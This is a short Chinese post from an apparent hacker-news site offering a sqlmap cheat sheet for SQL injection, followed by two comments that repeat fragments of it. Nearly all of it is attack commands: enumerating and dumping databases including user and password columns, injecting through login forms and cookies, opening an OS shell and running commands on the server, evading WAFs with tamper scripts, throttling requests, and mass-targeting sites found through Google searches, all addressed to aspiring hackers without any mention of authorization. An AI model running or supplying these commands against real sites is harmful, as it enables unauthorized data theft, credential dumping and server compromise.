SqlMap简单SQL注入

SqlMap简单SQL注入

黑客安全hacker2016-11-16 10:13:3610252A+A-

各大论坛常有许多sql注入圣器,但现还有的也不太好用了如啊D,明小子,御剑,只有御剑還是很非常好的。

如今给大伙儿推介某些大神常常用的引入圣器SQLmap(sql枚举数据表)坚信许多小黑客都还不了解或是不知道。 

你在因为我也不漫谈他的用途终究搜狗网有道具能够在BT5的中文网去下载

如今却说一会儿他的某些指令使用方法:

Mysql数据库引入:

sqlmap -u "url" --dbs

sqlmap -u "url" -D 数据表 --tables

sqlmap -u "url" -D 数据表 -T 表段 --columns

sqlmap -u "url" -D 数据表 -T 表段 -C id,user,pass --dump

--------------------------------------------------------------------------

Post登录框引入:

./sqlmap.py -r *.txt -p tfUPass

sqlmap -u url --forms

sqlmap -u url "tfUName=1(若为随意数)&tfUPass=1(若为随意数)"

--------------------------------------------------------------------------

伪静态引入:

sqlmap -u url/x*.html --dbs

---------------------------------------------------------------------------

互动写shell及指令实行:

cmdshell:

sqlmap -u url --os-shell

特定站名种类.1.asp 2.aspx 3.jsp 4.php(default)

特定站名主目录:盘符/文件名/

指令实行:

sqlmap -u url --os-cmd=ipconfig

特定站名种类.1.asp 2.aspx 3.jsp 4.php(default)

特定站名主目录:盘符/文件名/

--------------------------------------------------------------------------

Cookie引入:

sqlmap -u "url" --cookie "id=" --table --level 2

sqlmap -u "url" --cookie "id=" --clumns -T 表段 --level 2

sqlmap -u "url" --cookie "id=" --dump -T 表段 -C "user,pass" --level 2

--------------------------------------------------------------------------

恳求廷时引入:

sqlmap --dbs -u usr/x*.html --delay 1(時间,可随便)

sqlmap --dbs -u usr/x*.html --safe-freq 1(频次,可随便)

--------------------------------------------------------------------------

绕开WAF防火墙:

sqlmap -u url -v 3 --dbs --batch --tamper "space2morehash.py"

1.space2hash.py 2.base64encode.py 3.charencode.py

--------------------------------------------------------------------------

Google成批检验引入:

sqlmap -g 关键字

不明白不要紧  百度是你最合适的教师。


点击这里复制本文地址 以上内容由黑资讯整理呈现,请务必在转载分享时注明本文地址!如对内容有疑问,请联系我们,谢谢!
  • 2条评论
  • 孤鱼千鲤2022-05-28 17:25:25
  • py"1.space2hash.py 2.base64encode.py 3.charencode.py----------------------------------------------------------------
  • 辙弃并安2022-05-28 18:53:34
  • rl" --cookie "id=" --clumns -T 表段 --level 2sqlmap -u "url" --cookie "id=" --dump -T 表段 -C "user,p

支持Ctrl+Enter提交

黑资讯 © All Rights Reserved.  
Copyright Copyright 2015-2020 黑资讯
滇ICP备19002590号-1
Powered by 黑客资讯 Themes by 如有不合适之处联系我们
网站地图| 发展历程| 留言建议| 网站管理